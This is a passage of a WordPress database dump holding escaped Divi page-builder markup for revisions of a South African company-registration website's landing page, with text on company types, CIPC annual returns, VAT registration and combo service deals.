All</strong></p>\n[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>\n[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:52:10','2019-08-15 10:52:10','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32790,3,'2019-08-15 12:49:50','2019-08-15 10:49:50','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>\n[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" 